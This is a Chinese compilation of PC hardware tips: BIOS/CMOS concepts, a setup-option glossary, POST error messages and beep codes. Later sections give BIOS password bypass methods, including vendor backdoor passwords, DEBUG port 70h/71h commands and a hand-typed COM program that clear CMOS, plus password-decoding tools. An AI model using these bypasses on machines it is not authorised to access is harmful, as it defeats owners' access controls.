    BIOS ROM芯片不但可以在主板上看到，而且BIOS管理功能如何在很大程度上决定了主板性能是否优越。BIOS管理功能主要包括：

    1． BIOS中断服务程序

    BIOS中断服务程序实质上是微机系统中软件与硬件之间的一个可编程接口，主要用来在程序软件与微机硬件之间实现衔接。例如，DOS和Windows操作系统中对软盘、硬盘、光驱、键盘、显示器等外围设备的管理，都是直接建立在BIOS系统中断服务程序的基础上，而且操作人员也可以通过访问INT 5、INT 13等中断点而直接调用BIOS中断服务程序。

    2．BIOS系统设置程序

    微机部件配置记录是放在一块可读写的 CMOS RAM 芯片中的，主要保存着系统基本情况、CPU特性、软硬盘驱动器、显示器、键盘等部件的信息。在 BIOS ROM芯片中装有"系统设置程序"，主要用来设置CMOS RAM中的各项参数。这个程序在开机时按下某个特定键即可进入设置状态，并提供了良好的界面供操作人员使用。事实上，这个设置CMOS参数的过程，习惯上也称为" BIOS设置"。一旦CMOS RAM芯片中关于微机的配置信息不正确时，轻者会使得系统整体运行性能降低、软硬盘驱动器等部件不能识别，严重时就会由此引发一系统的软硬件故障。

    3． POST上电自检

    微机按通电源后，系统首先由POST（Power On Self Test,上电自检)程序来对内部各个设备进行检查。通常完整的POST自检将包括对 CPU、640K基本内存、 1M以上的扩展内存、ROM、主板、CMOS存贮器、串并口、显示卡、软硬盘子系统及键盘进行测试，一旦在自检中发现问题，系统将给出提示信息或鸣笛警告。

    4． BIOS系统启动自举程序

    系统在完成 POST自检后， ROM BIOS 就首先按照系统 CMOS设置中保存的启动顺序搜寻软硬盘驱动器及CD-ROM、网络服务器等有效地启动驱动器，读入操作系统引导记录，然后将系统控制权交给引导记录，并由引导记录来完成系统的顺利启动。

    CMOS是什么?

    CMOS(本意是指互补金属氧化物半导体存储嚣，是一种大规模应用于集成电路芯片制造的原料)是微机主板上的一块可读写的RAM芯片，主要用来保存当前系统的硬件配置和操作人员对某些参数的设定。CMOS RAM芯片由系统通过一块后备电池供电，因此无论是在关机状态中，还是遇到系统掉电情况，CMOS信息都不会丢失。

    由于CMOS RAM芯片本身只是一块存储器，只具有保存数据的功能，所以对CMOS中各项参数的设定要通过专门的程序。早期的CMOS设置程序驻留在软盘上的(如IBM的PC/AT机型)，使用很不方便。现在多数厂家将CMOS设置程序做到了 BIOS芯片中，在开机时通过按下某个特定键就可进入CMOS设置程序而非常方便地对系统进行设置，因此这种CMOS设置又通常被叫做BIOS设置。

BIOS设置和CMOS设置的区别与联系

    BIOS是主板上的一块EPROM或EEPROM芯片，里面装有系统的重要信息和设置系统参数的设置程序（BIOS Setup程序)；CMOS是主板上的一块可读写的RAM 芯片，里面装的是关于系统配置的具体参数，其内容可通过设置程序进行读写。CMOS RAM 芯片靠后备电池供电，即使系统掉电后信息也不会丢失。BIOS与CMOS既相关又不同：BIOS中的系统设置程序是完成CMOS参数设置的手段；CMOS RAM既是BIOS设定系统参数的存放场所，又是 BIOS设定系统参数的结果。因此，完整的说法应该是"通过BIOS设置程序对CMOS参数进行设置"。由于 BIOS和CMOS都跟系统设置密初相关，所以在实际使用过程中造成了BIOS设置和CMOS设置的说法，其实指的都是同一回事，但BIOS与CMOS却是两个完全不同的概念，千万不可搞混淆。

    何时要对BIOS或CMOS进行设置？

    众所周知，进行BIOS或CMOS设置是由操作人员根据微机实际情况而人工完成的一项十分重要的系统初始化工作。在以下情况下，必须进行BIOS或CMOS进行设置：

    1、新购微机

    即使带PnP功能的系统也只能识别一部分微机外围设备，而对软硬盘参数、当前日期、时钟等基本资料等必须由操作人员进行设置，因此新购买的微机必须通过进行CMOS参数设置来告诉系统整个微机的基本配置情况。

    2．新增设备

    由于系统不一定能认识新增的设备，所以必须通过CMOS设置来告诉它。另外，一旦新增设备与原有设备之间发生了IRQ、DMA冲突，也往往需要通过BIOS设置来进行排除。

    3．CMOS数据意外丢失

    在系统后备电池失效、病毒破坏了 CMOS数据程序、意外清除了CMOS参数等情况下，常常会造成CMOS数据意外丢失。此时只能重新进入BIOS设置程序完成新的CMOS参数设置。

    4．系统优化

    对于内存读写等待时间、硬盘数据传输模式、内／外 Cache的使用、节能保护、电源管理、开机启动顺序等参数， BIOS中预定的设置对系统而言并不一定就是最优的，此时往往需要经过多次试验才能找到系统优化的最佳组合。


BIOS中英文对照表

《一键清理系统垃圾》

BIOS中英文对照表

-英语水平不灵的就……

Time/System Time 时间/系统时间
Date/System Date 日期/系统日期
Level 2 Cache 二级缓存
System Memory 系统内存
Video Controller 视频控制器
Panel Type 液晶屏型号
Audio Controller 音频控制器
Modem Controller 调制解调器（Modem)
Primary Hard Drive 主硬盘
Modular Bay 模块托架
Service Tag 服务标签
Asset Tag 资产标签
BIOS Version BIOS版本
Boot Order/Boot Sequence 启动顺序（系统搜索操作系统文件的顺序）
Diskette Drive 软盘驱动器
Internal HDD 内置硬盘驱动器
Floppy device 软驱设备
Hard-Disk Drive 硬盘驱动器
USB Storage Device USB存储设备
CD/DVD/CD-RW Drive 光驱
CD-ROM device 光驱
Modular Bay HDD 模块化硬盘驱动器
Cardbus NIC Cardbus总线网卡
Onboard NIC 板载网卡
Boot POST 进行开机自检时（POST）硬件检查的水平：设置为"MINIMAL"（默认设置）则开机自检仅在BIOS升级，内存模块更改或前一次开机自检未完成的情况下才进行检查。设置为"THOROUGH"则开机自检时执行全套硬件检查。
Config Warnings 警告设置：该选项用来设置在系统使用较低电压的电源适配器或其他不支持的配置时是否报警，设置为"DISABLED"禁用报警，设置为"ENABLED"启用报警
Internal Modem 内置调制解调器：使用该选项可启用或禁用内置Modem。禁用（disabled）后Modem在操作系统中不可见。
LAN Controller 网络控制器：使用该选项可启用或禁用PCI以太网控制器。禁用后该设备在操作系统中不可见。
PXE BIS Policy/PXE BIS Default Policy
PXE BIS策略：该选项控制系统在没有认证时如何处理（启动整体服务Boot Integrity Services(BIS))授权请求。系统可以接受或拒绝BIS请求。设置为"Reset"时，在下次启动计算机时BIS将重新初始化并设置为"Deny"。
Onboard Bluetooth
板载蓝牙设备
MiniPCI Device
Mini PCI设备
MiniPCI Status
Mini PCI设备状态：在安装Mini PCI设备时可以使用该选项启用或禁用板载PCI设备
Wireless Control
无线控制：使用该选项可以设置MiniPCI和蓝牙无线设备的控制方式。设置为"Application"时无线设备可以通过"Quickset"等应用程序启用或禁用，热键不可用。设置为"/Application"时无线设备可以通过"Quickset"等应用程序或热键启用或禁用。设置为"Always Off"时无线设备被禁用，并且不能在操作系统中启用。
Wireless
无线设备：使用该选项启用或禁用无线设备。该设置可以在操作系统中通过"Quickset"或""热键更改。该设置是否可用取决于"Wireless Control"的设置。
Serial Port
串口：该选项可以通过重新分配端口地址或禁用端口来避免设备资源冲突。
Infrared Data Port
红外数据端口。使用该设置可以通过重新分配端口地址或禁用端口来避免设备资源冲突。
Parallel Mode
并口模式。控制计算机并口工作方式为"NORMAL"（AT兼容）（普通标准并行口）、"BI-DIRECTIONAL"（PS/2兼容）（双向模式，允许主机和外设双向通讯）还是"ECP"（Extended Capabilities Ports，扩展功能端口）（默认）。
Num Lock
数码锁定。设置在系统启动时数码灯（NumLock LED）是否点亮。设为"DISABLE"则数码灯保持灭，设为"ENABLE"则在系统启动时点亮数码灯。
Keyboard NumLock
键盘数码锁：该选项用来设置在系统启动时是否提示键盘相关的错误信息。
Enable Keypad
启用小键盘：设置为"BY NUMLOCK"在NumLock灯亮并且没有接外接键盘时启用数字小键盘。设置为"Only By Key"在NumLock灯亮时保持embedded键区为禁用状态。
External Hot Key
外部热键：该设置可以在外接PS/2键盘上按照与使用笔记本电脑上的键的相同的方式使用键。如果您使用ACPI操作系统鏦in2000或WinXP，则USB键盘不能使用键。仅在纯DOS模式下USB键盘才可以使用键。设置为"SCROLL LOCK"（默认选项）启用该功能，设置为"NOT INSTALLED"禁用该功能。
USB Emulation
USB仿真：使用该选项可以在不直接支持USB的操作系统中使用USB键盘、USB鼠标及USB软驱。该设置在BIOS启动过程中自动启用。启用该功能后，控制转移到操作系统时仿真继续有效。禁用该功能后在控制转移到操作系统时仿真关闭。
Pointing Device
指针设备：设置为"SERIAL MOUSE"时外接串口鼠标启用并集成触摸板被禁用。设置为"PS/2 MOUSE"时，若外接PS/2鼠标，则禁用集成触摸板。设置为"TOUCH PAD-PS/2 MOUSE"（默认设置）时，若外接PS/2鼠标，可以在鼠标与触摸板间切换。更改在计算机重新启动后生效。
Video Expansion
视频扩展：使用该选项可以启用或禁用视频扩展，将较低的分辨率调整为较高的、正常的LCD分辨率。
Battery
电池
Battery Status
电池状态
Power Management
电源管理
Suspend Mode
挂起模式
AC Power Recovery
交流电源恢复：该选项可以在交流电源适配器重新插回系统时电脑的相应反映。
Low Power Mode
低电量模式：该选项用来设置系统休眠或关闭时所用电量。
Brightness
亮度：该选项可以设置计算机启动时显示器的亮度。计算机工作在电源供电状态下时默认设置为一半。计算机工作在交流电源适配器供电状态下时默认设置为最大。
Wakeup On LAN
网络唤醒：该选项设置允许在网络信号接入时将电脑从休眠状态唤醒。该设置对待机状态（Standby state）无效。只能在操作系统中唤醒待机状态。该设置仅在接有交流电源适配器时有效。
Auto On Mod 自动开机模式：注意若交流电源适配器没有接好，该设置将无法生效。该选项可设置计算机自动开机时间，可以设置将计算机每天自动开机或仅在工作日自动开机。设置在计算机重新启动后生效。
Auto On Time 自动开机时间：该选项可设置系统自动开机的时间，时间格式为24小时制。键入数值或使用左、右箭头键设定数值。设置在计算机重新启动后生效。
Dock Configuration 坞站配置
Docking Status 坞站状态
Universal Connect 通用接口：若所用操作系统为WinNT4.0或更早版本，该设置无效。如果经常使用不止一个戴尔坞站设备，并且希望最小化接入坞站时的初始时间，设置为"ENABLED"（默认设置）。如果希望操作系统对计算机连接的每个新的坞站设备都生成新的系统设置文件，设置为"DISABLED"。
System Security 系统安全
Primary Password 主密码
Admin Password
管理密码
Hard-disk drive password(s) 硬盘驱动器密码
Password Status 密码状态：该选项用来在Setup密码启用时锁定系统密码。将该选项设置为"Locked"并启用Setup密码以放置系统密码被更改。该选项还可以用来放置在系统启动时密码被用户禁用。
System Password 系统密码
Setup Password Setup密码
Post Hotkeys 自检热键：该选项用来指定在开机自检（POST）时屏幕上显示的热键（F2或F12）。
Chassis Intrusion
机箱防盗：该选项用来启用或禁用机箱防盗检测特征。设置为"Enable-Silent"时，启动时若检测到底盘入侵，不发送警告信息。该选项启用并且机箱盖板打开时，该域将显示"DETECTED"。
Drive Configuration
驱动器设置
Diskette Drive A: 磁盘驱动器A:如果系统中装有软驱，使用该选项可启用或禁用软盘驱动器
Primary Master Drive 第一主驱动器
Primary Slave Drive 第一从驱动器
Secondary Master Drive 第二主驱动器
Secondary Slave Drive 第二从驱动器
IDE Drive UDMA 支持UDMA的IDE驱动器：使用该选项可以启用或禁用通过内部IDE硬盘接口的DMA传输。
Hard-Disk drive Sequence 硬盘驱动器顺序
System BIOS boot devices 系统BIOS启动顺序
USB device USB设备
Memory Information 内存信息
Installed System Memory 系统内存：该选项显示系统中所装内存的大小及型号
System Memory Speed
内存速率：该选项显示所装内存的速率
System Memory Channel Mode 内存信道模式：该选项显示内存槽设置。
AGP Aperture AGP区域内存容量：该选项指定了分配给视频适配器的内存值。某些视频适配器可能要求多于默认值的内存量。
CPU information CPU信息
CPU Speed CPU速率：该选项显示启动后中央处理器的运行速率
Bus Speed 总线速率：显示处理器总线速率
Processor 0 ID 处理器ID：显示处理器所属种类及模型号
Clock Speed 时钟频率
Cache Size 缓存值：显示处理器的二级缓存值
Integrated Devices(LegacySelect Options) 集成设备
Sound 声音设置：使用该选项可启用或禁用音频控制器
Network Interface Controller
网络接口控制器：启用或禁用集成网卡
Mouse Port 鼠标端口：使用该选项可启用或禁用内置PS/2兼容鼠标控制器
USB Controller USB控制器：使用该选项可启用或禁用板载USB控制器。
PCI Slots PCI槽：使用该选项可启用或禁用板载PCI卡槽。禁用时所有PCI插卡都不可用，并且不能被操作系统检测到。
Serial Port 1 串口1：使用该选项可控制内置串口的操作。设置为"AUTO"时，如果通过串口扩展卡在同一个端口地址上使用了两个设备，内置串口自动重新分配可用端口地址。串口先使用COM1，再使用COM2，如果两个地址都已经分配给某个端口，该端口将被禁用。
Parallel Port 并口：该域中可配置内置并口
Mode 模式：设置为"AT"时内置并口仅能输出数据到相连设备。设置为PS/2、EPP或ECP模式时并口可以输入、输出数据。这三种模式所用协议和最大数据传输率不同。最大传输速率PS/2 I/O Address 输入/输出地址
DMA Channel DMA通道：使用该选项可以设置并口所用的DMA通道。该选项仅在并口设置为"ECP"时可用。
Diskette Interface 磁盘接口：使用该选项可以设置内置软盘驱动器的操作。设置为AUTO时，若装有软驱，则内置磁盘控制器被禁用。若没有检测到磁盘控制器，则启用内置控制器。
PC Speaker 系统喇叭：使用该选项可启用或禁用系统喇叭
Primary Video Controller 主视频控制器：使用该选项可以在启动过程中指定视频控制器。设置为"AUTO"时若装有内置显卡，系统可以使用。否则系统将使用板载视频控制器。设置为"Onboard"时系统总是使用板载控制器
Onboard Video Buffer 板载显卡缓存
Report Keyboard Errors
键盘报错
Auto Power On 自动开机
Auto Power On Mode 自动开机模式
Auto Power On Time 自动开机时间
Remote Wake Up 远程唤醒：该选项设置为"ON"时，若网卡或有远程唤醒功能的调制解调器收到唤醒信号时，系统将被唤醒。该选项设置为"On w/Boot to NIC 时"，系统启动时首先尝试网络启动。
Fast Boot 快速启动：该选项在操作系统请求精简启动时系统启动的速度。
IDE Hard Drive Acoustics Mode IDE硬盘声音模式
System Event Log 系统事件日志


BIOS自检报错信息

《一键清理系统垃圾》

BIOS自检报错信息

  微机在启动的时候，主板BIOS会对所有硬件设置进行自检，一旦发生错误或故障，BIOS除了发出响铃以外，还会在显示屏幕上提示出错信息，下面归纳一部分常见出错提示：
----BIOS ROM checksum error-System halted
翻译：BIOS 信息在进行总和检查 ( checksum ) 时发现错误，因此无法开机。
解析：会遇到这种问题...通常是「死定了」！通常是因为 BIOS 信息刷新不完
全所造成的.
----CMOS battery failed
翻译：CMOS 电池失效。
解析：这表是 CMOS 电池的电力已经不足，请更换电池。
----CMOS checksum error-Defaults loaded
翻译：CMOS 执行整和检查时发现错误，因此载入预设的系统设定值。
解析：通常发生这种状况都是因为电池电力不足所造成，因此建议先换电源看看。如果此情形依然存在，那就有可能是 CMOS RAM 有问题，而因为 CMOS RAM 我们个人是无法维修的，所以建议送回原厂处理。
----Display switch is set incorrectly
翻译：显示开关配置错误。
解析：较旧型的主机板上有 Jumper 可设定萤幕为单色或彩色，而此讯息表示主机板上的设定和 BIOS 里的设定不一致，所以只要判断主机板和BIOS谁为正确，然后更新错误的设定即可。
----Press ESC to skip memory test
翻译：在内存测试中，可按下 ESC 略过。
解析：如果你在 BIOS 内并没有设定快速测试的话，那么开机就会执行电脑零件的测试，如果你不想等待，可按 ESC 略过或到 BIOS 内开启 Quick Power On Self Test一劳永逸
----HARD DISK initizlizing 【Please wait a moment...】
翻译：正在对硬盘做起始化 ( Initizlize ) 动作。
解析：这种讯息在较新的硬盘上根本看不到。但在较旧型的硬盘上，其动作因为较慢，所以就会看到这个讯息。
----HARD DISK INSTALL FAILURE
翻译：硬盘安装失败。
解析：遇到这种事，请先检查硬碟的电源线、硬盘线是否安装妥当？或者硬盘 Jumper 是否设错？ ( 例如两台都设为 Master 或 Slave。)
----Primary master hard disk fail
翻译：POST 侦测到 Primary master IDE 硬盘有错误。
解析：遇到这种事，请先检查硬盘的电源线、硬盘线是否安装妥当？或者硬盘 Jumper 是否设错？ ( 例如两台都设为 Master 或 Slave。)
----Primary slave hard disk fail
翻译：POST 侦测到 Primary slave IDE 硬盘有错误。
解析：遇到这种事，请先检查硬盘的电源线、硬盘线是否安装妥当？或者硬盘 Jumper 是否设错？ ( 例如两台都设为 Master 或 Slave。)
----Secondary master hard fail
翻译：POST 侦测到 Secondary master IDE 硬盘有错误。
解析：遇到这种事，请先检查硬盘的电源线、硬盘线是否安装妥当？或者硬盘 Jumper 是否设错？ ( 例如两台都设为 Master 或 Slave。)
----Secondary slave hard fail
翻译：POST 侦测到 Secondary slave IDE 硬盘有错误。
解析：遇到这种事，请先检查硬盘的电源线、硬盘线是否安装妥当？或者硬盘 Jumper 是否设错？ ( 例如两台都设为 Master 或 Slave。)
----Hard disk(s) disagnosis fail
翻译：执行硬盘诊断时发生错误
解析：这种讯息通常代表硬盘本身故障...你可以先把这颗硬盘接到别的电脑上试试看，如果还是一样的问题，那只好送修了。
----Floppy disk(s) fail
翻译：无法驱动软驱。
解析：先检查软软驱线有没有接错或松脱？电源线有没有接好？如果这些都没问题，那可能就是软驱故障了。
----FLOPPY DISK(S) fail(80)
翻译：无法驱动软驱。
解析：先检查软驱线有没有接错或松脱？电源线有没有接好？如果这些都没问题，那可能就是软驱故障了。
----FLOPPY DISK(S) fail(40)
翻译：无法驱动软驱。
解析：先检查软驱线有没有接错或松脱？电源线有没有接好？如果这些都没问题，那可能就是软驱故障了。
----Keyboard error or no keyboard present
翻译：此讯息表示无法启动键盘。
解析：检查看看键盘连接线有没有插好？把它插好即可。
----Memory test fail
翻译：内存测试失败。
解析：通常会发生这种情形大概都是因为内存不兼容或故障所导致，所以请先以每次开机一条内存的方式分批测试，找出故障的内存，把它拿掉或送修即可。
----Override enable-Defualts loaded
翻译：目前的 CMOS 组态设定如果无法启动系统，则载入 BIOS 预设值以启动系统。
解析：可能是你在 BIOS 内的设定并不适合你的电脑 ( 像你的内存只能跑PC100但你让它跑PC133 )，这时进入 BIOS 设定画面把设定以稳定为优先做调整即可。
----Press TAB to show POST screen
翻译：按 TAB 可以切换幕萤显示。
解析：有一些 OEM 厂商会以自己设计的显示画面来取代 BIOS 预设的 POST 显示画面，而此讯息就是要告诉使用者可以按 TAB 来把厂商的自定画面和 BIOS 预设的 POST 画面来做切换。


BIOS自检响铃含义

《一键清理系统垃圾》

BIOS自检响铃含义

    在电脑发生故障时，机器响铃不断。这时，如果你是一位高手，也许可以根据经验判断出故障所在，若根据经验无法判断，或者你对硬件设备一无所知，这时只有去请教专业人员了。笔者由于一台电脑出现故障，开机后只有机器报错的响铃，找不到故障点，只好上网去查询PC机开机自检响铃代码的含义，最终依据代码准确查找出故障所在部位并将其排除。好东西不敢私藏，特向大家推荐，希望你也能据此准确地判断出故障所在，当一回高手。

    本文以较常见的三种BIOS（Award BIOS、AMI BIOS和Phoenix BIOS）的电脑为例，介绍开机自检响铃代码的具体含义（关于电脑使用的BIOS型号可从BIOS芯片上或者从开机自检的信息中看到，如看到AMI的字样则为AMI BIOS；如看到Award字样则为Award BIOS）。

一、Award BIOS自检响铃含义：

    1短：系统正常启动。恭喜，你的机器没有任何问题。

    2短：常规错误，请进入CMOS Setup，重新设置不正确的选项。

    1长1短：RAM或主板出错。换一条内存试试，若还是不行，只好更换主板。

    1长2短：显示器或显示卡错误。

    1长3短：键盘控制器错误。检查主板。

    1长9短：主板Flash RAM或EPROM错误，BIOS损坏。换块Flash RAM试试。

    不断地响（长声）：内存条未插紧或损坏。重插内存条，若还是不行，只有更换一条内存。

    不停地响：电源、显示器未和显示卡连接好。检查一下所有的插头。

    重复短响：电源有问题。

    无声音无显示：电源有问题。

二、AMI BIOS自检响铃含义：

    1短：内存刷新失败。更换内存条。

    2短：内存ECC较验错误。在CMOS Setup中将内存关于ECC校验的选项设为Disabled就可以解决，不过最根本的解决办法还是更换一条内存。

    3短：系统基本内存（第1个64kB）检查失败。换内存。

    4短：系统时钟出错。

    5短：中央处理器（CPU）错误。

    6短：键盘控制器错误。

    7短：系统实模式错误，不能切换到保护模式。

    8短：显示内存错误。显示内存有问题，更换显卡试试。

    9短：ROM BIOS检验和错误。

    1长3短：内存错误。内存损坏，更换即可。

    1长8短：显示测试错误。显示器数据线没插好或显示卡没插牢。

二、Phoenix BIOS自检响铃含义：

自检响铃
自检响铃含义
自检响铃
自检响铃含义

1短
系统启动正常
1短1短1短
系统加电初始化失败

1短1短2短
主板错误
1短1短3短
CMOS或电池失效

1短1短4短
ROM BIOS校验错误
1短2短1短
系统时钟错误

1短2短2短
DMA初始化失败
1短2短3短
DMA页寄存器错误

1短3短1短
RAM刷新错误
1短3短2短
基本内存错误

1短3短3短
基本内存错误
1短4短1短
基本内存地址线错误

1短4短2短
基本内存校验错误
1短4短3短
EISA时序器错误

1短4短4短
EISA NMI口错误
2短1短1短
前64K基本内存错误

3短1短1短
从DMA寄存器错误
3短1短2短
主DMA寄存器错误

3短1短3短
主中断处理寄存器错误
3短1短4短
从中断处理寄存器错误

3短2短4短
键盘控制器错误
3短3短4短
屏幕存储器测试失败

3短4短2短
显示错误
3短4短3短
时钟错误

4短2短2短
关机错误
4短2短3短
A20门错误

4短2短4短
保护模式中断错误
4短3短1短
内存错误

4短3短3短
时钟2错误
4短3短4短
时钟错误

4短4短1短
串行口错误
4短4短2短
并行口错误

4短4短3短
数字协处理器错误

    技术网站：www.163164.com 或 www.163164.cn　 QQ 3149886


CMOS开机密码解密集锦

《一键清理系统垃圾》

CMOS开机密码解密集锦

    为了保护计算机的资源和安全，可以为其加上开机密码。但是一旦不小心将密码忘记，就会致使计算机不能进入BIOS设置，或者不能启动计算机。

    (1)可先试一下通用口令,如AMI BIOS的通用口令是“AMI”，AWORD BIOS的通用口令比较多，可能有“AWORD”，“H996”，“Syzx”，“WANTGIRL”，“AwordSW”等等，输入时请注意大小写，不过很多新的主板都不支持通用口令，或者是有通用口令但大家还没有发现，所以通用口令不是万能的。

    (2)如果您的计算机能启动，但不能进入BIOS设置，可以用以下方法，但要注意，如果您看不懂下面的操作，就不要尝试，老老实实用(3)中的方法吧：　　电脑的BIOS设置可以通过70H和71H两个端口进行访问和更改，最简单的方法就是将其全部清除，即变成缺省设置。但是有个条件就是计算机在己经启动的前提下，才能进行以下的操作。

    如下程序段可以完成对所有电脑CMOS的清除工作:

                C:\>debug

                    -o 70 20

                    -o 71 20

                    -r

                    -q

    现在，启动电脑，即可进入BIOS进行一些其本设置了。有少数主板可能用这种方法行不通。

    (3)这种方法是一定成功的，缺点就是必须打开机箱。打开机箱后，在主板上找到清除CMOS内容的跳线(参考主板的说明书)，将其短接三五秒后再开机，CMOS内容会清除为出厂时的设置，注意不要将短路用的跳线一直插在上面，这样您会无法设置BIOS的。

    解COMS密码的方法很多，现将其“软”方法(即用编制小程序清除口令密码)汇集，以飨大家。

    一、用DEBUG清除口令密码

    在DOS命令行运行DEBUG程序，然后可用以下方法之一解密(如表)

    解CMOS密码的方法很多，现将其“软”方法（即用编制小程序清除口令密码）汇集，现将方法献给大家。

    用DEBUG清除口令密码

方法一 方法二 方法三 方法四 方法五 方法六
-O 70 16
-O 71 16
-Q -O 70 11
-O 71 FF
-Q -O 70 10
-O 71 10
-Q -O 70 23
-O 71 34
-Q -O 70 10
-O 71 FF
-Q -O 70 20
-O 71 20
-Q

现在主板的破解方法大多为第六种。

，输入完后重启电脑即可。

    二、用COPY命令清除口令密码

    用“COPYCOMJM.COM”命令建立一个有十个字节的文件JM.COM。注意：一些特殊字符是用ALT键加小键盘数字键输入的。

    在DOS命令行运行COPYCONJM.COM命令：

    C:\DOS>COPYCONJM.COM

    然后输入相应的十个字符：

    第一、二、三个字符是ALT＋176、ALT＋17、ALT＋230；第四个字符是p；第五、六、七个字符是ALT＋176、ATL＋20、ATL＋230；第八个字符是q；第九个字符是ALT＋205；第十字符是空格。

    按上述方法将十个字符输入后，按F6存盘，即生成一个十字节的小文件JM.COM，执行它即可。以上方法成功率在95％之上。

    细心的读者也许已注意到用DEBUG解密中的法一、二、三、四、五中都有70和71两个数字，其实COMS中数据访问是通过两个I/O端口来实现的。端口70H是一个字节的地址端口，它是用来设置COMS中数据的地址；端口71H是用来读写端口70H设置COMS地址中的数据单元内容。其实将JM.COM反汇编后，也会看到70H和71H两个端口。

    三、用工具软件查出密码

    Biospwds.exe和Comspwd.exe这两个工具都能满足你的要求，下面我就来把它们详细介绍一下：

    Comspwd.exe为DOS下的工具，当然也可在Windows的MS－DOS窗口下使用，运行后就会出现有关BIOS的信息。比较有特色的是它不仅会根据密码加密方式的不同分别解出Award、AMI和Phoenix等不同BIOS厂商的密码，而且还能算出IBM、Dell、Compaq等品牌电脑专用BIOS的密码，可见作者设计时考虑得十分周到。它的大小只有10.3KB，平时在自己的邮箱中保留一个备份，随用随下。

    Biospwds.exe是Windows下运行的软件，同样也只由一个文件构成，运行后点“Getpasswords”就会自动识别BIOS的厂家、版本、日期及超级用户密码等。不过它的体积稍大，有167KB。

    在使用上述两个软件的过程中，你会发现程序显示的密码有时和真实的密码有所不同，这是正常现象。它们都是对BIOS编码过的密码进行逆向解码，得出的结果可能并不唯一。

    技术网站：www.163164.com 或 www.163164.cn　 QQ 3149886


CMOS开机密码解密集锦

《一键清理系统垃圾》

CMOS开机密码解密集锦

    解COMS密码的方法很多，现将其“软”方法（即用编制小程序清除口令密码）汇集，以飨大家。
#1　　一、用DEBUG清除口令密码
    在DOS命令行运行DEBUG程序，然后可用以下五种方法之一解密（如^24030301a^表），输入完后重启电脑即可。
#1　　二、用COPY命令清除口令密码
    用“COPY COM JM.COM”命令建立一个有十个字节的文件JM.COM。注意：一些特殊字符是用ALT键加小键盘数字键输入的。
    在DOS命令行运行COPY CON JM.COM命令：
    C:\DOS>COPY CON JM.COM
    然后输入相应的十个字符：
    第一、二、三个字符是ALT＋176、ALT＋17、ALT＋230；第四个字符是p；第五、六、七个字符是ALT＋176、ATL＋20、ATL＋230；第八个字符是q；第九个字符是ALT＋205；第十字符是空格。
    按上述方法将十个字符输入后，按F6存盘，即生成一个十字节的小文件JM.COM，执行它即可。以上方法成功率在95％之上。
    细心的读者也许已注意到用DEBUG解密中的法一、二、三、四、五中都有70和71两个数字，其实COMS中数据访问是通过两个I/O端口来实现的。端口70H是一个字节的地址端口，它是用来设置COMS中数据的地址；端口71H是用来读写端口70H设置COMS地址中的数据单元内容。其实将JM.COM反汇编后，也会看到70H和71H两个端口。
#1　　三、用工具软件查出密码
    Biospwds.exe和Comspwd.exe这两个工具都能满足你的要求，下面我就来把它们详细介绍一下：
    Comspwd.exe为DOS下的工具，当然也可在Windows的MS－DOS窗口下使用，运行后就会出现有关BIOS的信息。比较有特色的是它不仅会根据密码加密方式的不同分别解出Award、AMI和Phoenix等不同BIOS厂商的密码，而且还能算出IBM、Dell、Compaq等品牌电脑专用BIOS的密码，可见作者设计时考虑得十分周到。它的大小只有10.3KB，平时在自己的邮箱中保留一个备份，随用随下。
    Biospwds.exe是Windows下运行的软件，同样也只由一个文件构成，运行后点“Get passwords”就会自动识别BIOS的厂家、版本、日期及超级用户密码等。不过它的体积稍大，有167KB。
    在使用上述两个软件的过程中，你会发现程序显示的密码有时和真实的密码有所不同，这是正常现象。它们都是对BIOS编码过的密码进行逆向解码，得出的结果可能并不唯一。


CMOS密码清除方法

《一键清理系统垃圾》

CMOS密码清除方法

打开机箱，找到主板上的电池，将其与主板的连接断开（就是取下电池喽），此时CMOS将因断电而失去内部储存的一切信息。再将电池接通，合上机箱开机，由于CMOS已是一片空白，它将不再要求你输入密码，此时进入BIOS设置程序，选择主菜单中的"LOAD BIOS DEFAULT"（装入BIOS缺省值）或"LOAD SETUP DEFAULT"（装入设置程序缺省值）即可，前者以最安全的方式启动计算机，后者能使你的计算机发挥出较高的性能。

妙用DEBUG清除CMOS密码

如果你忘记了进入CMOS设置程序的密码，除了可以在主板上使用跳线短接清除的方法外，还可以使用软件清除的方法，下面就来介绍如何在DOS下清除CMOS密码的方法。

在DOS中提供了一个编辑器，就是DEBUG，这是一个非常实用的工具，启动方法是，在DOS命令提示符状态下输入命令：DEBUG、此时即可进入DEBUG编辑界面。

在命令符状态下输入命令后，重新启动电脑即可清除CMOS密码，下面给出五个清除CMOS密码的命令行。

方法一
-o 70 16
-o 71 16
-q
方法二
-o 70 11
-o 71 ff
-q
方法三
-o 70 10
-o 71 10
-q
方法四
-o 70 23
-o 71 34
-q
方法五
-o 70 10
-o 71 ff
-q

方法六
-o 70 90
-o 71 91
-q


Phoenix BIOS 自检响铃含义

《一键清理系统垃圾》

Phoenix BIOS 自检响铃含义

报警声数　　 错误含义

1短　　　　 系统启动正常

1短1短1短　 系统加点初始化失败

1短1短2短　 主板错误

1短1短3短　 CMOS或电池失效

1短1短4短　 ROM BIOS校验错误

1短2短1短　 系统时钟错误

1短2短2短　 DMA初始化失败

1短2短3短　 DMA页寄存器错误

1短3短1短　 RAM刷新错误

1短3短2短　 基本内存错误

1短3短3短　 基本内存错误

1短4短1短　 基本内存地址线错误

1短4短2短　 基本内存校验错误

1短4短3短　 EKSA 时序器错误

1短4短4短　 ELSA NMI错误

2短1短1短　 前64KB 基本内存错误

3短1短1短　 从DMA寄存器错误

3短1短2短　 主DMA寄存器错误

3短1短3短　 主中断处理寄存器错误

3短1短4短　 从中断处理寄存器错误

3短2短4短　 键盘控制器错误

3短3短4短　 显示内存错误

3短4短2短　 显示错误

3短4短3短　 未发现显示只读存储器

4短2短1短　 时钟错误

4短2短2短　 关机错误

4短2短3短　 A20门错误

4短2短4短　 保护模式中断错误

4短3短1短　 内存错误

4短3短3短　 时钟2错误

4短3短4短　 时钟错误

4短4短1短　 串行口错误

4短4短2短　 并行口错误

4短4短3短　 数字协处理器错误


打造自己的BIOS万能密码

《一键清理系统垃圾》

打造自己的BIOS万能密码

《中国电脑教育报》徐颖

